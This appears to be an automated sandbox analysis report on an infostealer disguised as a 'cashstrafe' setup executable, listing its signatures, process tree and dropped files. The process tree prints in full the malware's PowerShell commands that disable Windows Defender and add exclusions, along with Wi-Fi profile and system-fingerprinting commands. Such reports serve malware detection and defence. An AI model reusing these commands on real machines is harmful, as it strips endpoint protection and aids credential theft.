Resubmissions

08/05/2024, 20:54

240508-zp39cafa8v 3

08/05/2024, 20:54

240508-zpv8qshe76 8

Analysis

  • max time kernel
    120s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240508-en locale:en-us os:windows10-2004-x64 system
  • submitted
    08/05/2024, 20:54

General

  • Target

    cashstrafe/2.3setup.exe

  • Size

    15.6MB

  • MD5

    6a109e709c03acd33a5619f46d4857fc

  • SHA1

    7cbdcb9c10b28d509d43c0c33f3fe524f0f19b09

  • SHA256

    48dfb6defced66346ed09174e4c62aa36f7006c39ce7ee57d4e7f3684cb3c629

  • SHA512

    ec2698bca6e9de2482f1dd45213ce21b28bd8cd17f16bf7d1e4a9015682e8eda7d4d124208578d71c2930b00031515f5b90a47cf4fa44377fcb198cfcb0c7577

  • SSDEEP

    393216:7h9S2nnx837XfZh2Jp5MLurEUWjljEh01tGymWX8Wjs+da:d9Dnxq7BhpdbJ91symJes+da

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe
    "C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe
      "C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Windows\system32\netsh.exe
          netsh wlan show profiles
          4⤵
            PID:1640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3460
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5056
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2932
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4724
        • C:\Windows\System32\Wbem\wmic.exe
          wmic cpu get Name
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4924
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
              PID:2168
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4540
            • C:\Windows\System32\wbem\WMIC.exe
              C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
              4⤵
                PID:2624

        Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\0dAunZT8ao\Browser\cc's.txt

                Filesize

                91B


              • C:\Users\Admin\AppData\Local\Temp\0dAunZT8ao\Browser\history.txt

                Filesize

                23B


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_cbc.pyd

                Filesize

                10KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_cfb.pyd

                Filesize

                10KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_ecb.pyd

                Filesize

                9KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_ofb.pyd

                Filesize

                10KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\VCRUNTIME140.dll

                Filesize

                116KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\VCRUNTIME140_1.dll

                Filesize

                48KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_asyncio.pyd

                Filesize

                37KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_bz2.pyd

                Filesize

                48KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_cffi_backend.cp312-win_amd64.pyd

                Filesize

                71KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ctypes.pyd

                Filesize

                59KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_decimal.pyd

                Filesize

                105KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_hashlib.pyd

                Filesize

                35KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_lzma.pyd

                Filesize

                86KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_multiprocessing.pyd

                Filesize

                27KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_overlapped.pyd

                Filesize

                33KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_queue.pyd

                Filesize

                26KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_socket.pyd

                Filesize

                44KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_sqlite3.pyd

                Filesize

                57KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ssl.pyd

                Filesize

                65KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_uuid.pyd

                Filesize

                24KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_wmi.pyd

                Filesize

                28KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\base_library.zip

                Filesize

                1.3MB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\charset_normalizer\md.cp312-win_amd64.pyd

                Filesize

                9KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

                Filesize

                39KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\libcrypto-3.dll

                Filesize

                1.6MB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\libffi-8.dll

                Filesize

                29KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\libssl-3.dll

                Filesize

                222KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\psutil\_psutil_windows.pyd

                Filesize

                31KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\pyexpat.pyd

                Filesize

                87KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\python3.DLL

                Filesize

                66KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\python312.dll

                Filesize

                1.8MB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\select.pyd

                Filesize

                25KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\sqlite3.dll

                Filesize

                630KB


              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\unicodedata.pyd

                Filesize

                295KB


              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cyjkzr5.mom.ps1

                Filesize

                60B



                Filesize

                5.2MB

              • memory/1948-261-0x0000029E601E0000-0x0000029E60709000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-263-0x00007FFA7C0D0000-0x00007FFA7C19D000-memory.dmp

                Filesize

                820KB

              • memory/1948-264-0x00007FFA85D80000-0x00007FFA85D8F000-memory.dmp

                Filesize

                60KB

              • memory/1948-298-0x00007FFA7BAC0000-0x00007FFA7BACE000-memory.dmp

                Filesize

                56KB

              • memory/1948-297-0x00007FFA7BAD0000-0x00007FFA7BADC000-memory.dmp

                Filesize

                48KB

              • memory/1948-268-0x00007FFA6CFD0000-0x00007FFA6D6A9000-memory.dmp

                Filesize

                6.8MB

              • memory/1948-316-0x00007FFA7C810000-0x00007FFA7C822000-memory.dmp

                Filesize

                72KB

              • memory/1948-315-0x00007FFA7CA20000-0x00007FFA7CA36000-memory.dmp

                Filesize

                88KB

              • memory/1948-322-0x00007FFA791C0000-0x00007FFA791CC000-memory.dmp

                Filesize

                48KB

              • memory/1948-321-0x00007FFA7B1E0000-0x00007FFA7B1F2000-memory.dmp

                Filesize

                72KB

              • memory/1948-320-0x00007FFA7B200000-0x00007FFA7B20D000-memory.dmp

                Filesize

                52KB

              • memory/1948-319-0x00007FFA7B210000-0x00007FFA7B21C000-memory.dmp

                Filesize

                48KB

              • memory/1948-318-0x00007FFA7B430000-0x00007FFA7B43C000-memory.dmp

                Filesize

                48KB

              • memory/1948-317-0x00007FFA7BA90000-0x00007FFA7BA9B000-memory.dmp

                Filesize

                44KB

              • memory/1948-314-0x00007FFA7CA10000-0x00007FFA7CA1B000-memory.dmp

                Filesize

                44KB

              • memory/1948-313-0x00007FFA7D360000-0x00007FFA7D36B000-memory.dmp

                Filesize

                44KB

              • memory/1948-312-0x00007FFA7C0D0000-0x00007FFA7C19D000-memory.dmp

                Filesize

                820KB

              • memory/1948-311-0x00007FFA7C680000-0x00007FFA7C6B3000-memory.dmp

                Filesize

                204KB

              • memory/1948-310-0x00007FFA80350000-0x00007FFA8035D000-memory.dmp

                Filesize

                52KB

              • memory/1948-309-0x00007FFA803B0000-0x00007FFA803BD000-memory.dmp

                Filesize

                52KB

              • memory/1948-308-0x00007FFA7E510000-0x00007FFA7E529000-memory.dmp

                Filesize

                100KB

              • memory/1948-307-0x00007FFA7C940000-0x00007FFA7C975000-memory.dmp

                Filesize

                212KB

              • memory/1948-306-0x00007FFA82620000-0x00007FFA8262D000-memory.dmp

                Filesize

                52KB

              • memory/1948-305-0x00007FFA80230000-0x00007FFA8025D000-memory.dmp

                Filesize

                180KB

              • memory/1948-304-0x00007FFA803C0000-0x00007FFA803D9000-memory.dmp

                Filesize

                100KB

              • memory/1948-303-0x00007FFA82630000-0x00007FFA8263F000-memory.dmp

                Filesize

                60KB

              • memory/1948-302-0x00007FFA82810000-0x00007FFA82835000-memory.dmp

                Filesize

                148KB

              • memory/1948-301-0x00007FFA7BFB0000-0x00007FFA7BFD7000-memory.dmp

                Filesize

                156KB

              • memory/1948-300-0x00007FFA7BAA0000-0x00007FFA7BAAB000-memory.dmp

                Filesize

                44KB

              • memory/1948-299-0x00007FFA7BAB0000-0x00007FFA7BABC000-memory.dmp

                Filesize

                48KB

              • memory/1948-296-0x00007FFA7BAE0000-0x00007FFA7BAEC000-memory.dmp

                Filesize

                48KB

              • memory/1948-295-0x00007FFA7BAF0000-0x00007FFA7BAFB000-memory.dmp

                Filesize

                44KB

              • memory/1948-294-0x00007FFA7BF90000-0x00007FFA7BF9C000-memory.dmp

                Filesize

                48KB

              • memory/1948-293-0x00007FFA7BFA0000-0x00007FFA7BFAB000-memory.dmp

                Filesize

                44KB

              • memory/1948-292-0x00007FFA7C070000-0x00007FFA7C07C000-memory.dmp

                Filesize

                48KB

              • memory/1948-291-0x00007FFA7C670000-0x00007FFA7C67B000-memory.dmp

                Filesize

                44KB

              • memory/1948-289-0x00007FFA6BF60000-0x00007FFA6C07B000-memory.dmp

                Filesize

                1.1MB

              • memory/1948-286-0x00007FFA7C250000-0x00007FFA7C264000-memory.dmp

                Filesize

                80KB

              • memory/1948-285-0x00007FFA7C270000-0x00007FFA7C288000-memory.dmp

                Filesize

                96KB

              • memory/1948-284-0x00007FFA6C080000-0x00007FFA6C1F6000-memory.dmp

                Filesize

                1.5MB

              • memory/1948-283-0x00007FFA7C290000-0x00007FFA7C2B4000-memory.dmp

                Filesize

                144KB

              • memory/1948-280-0x00007FFA6C530000-0x00007FFA6CA59000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-324-0x00007FFA732D0000-0x00007FFA732F9000-memory.dmp

                Filesize

                164KB

              • memory/1948-323-0x00007FFA6BCD0000-0x00007FFA6BF53000-memory.dmp

                Filesize

                2.5MB

              • memory/2120-219-0x0000028918800000-0x0000028918822000-memory.dmp

                Filesize

                136KB

              • memory/2932-251-0x000001A2E2DC0000-0x000001A2E2FDC000-memory.dmp

                Filesize

                2.1MB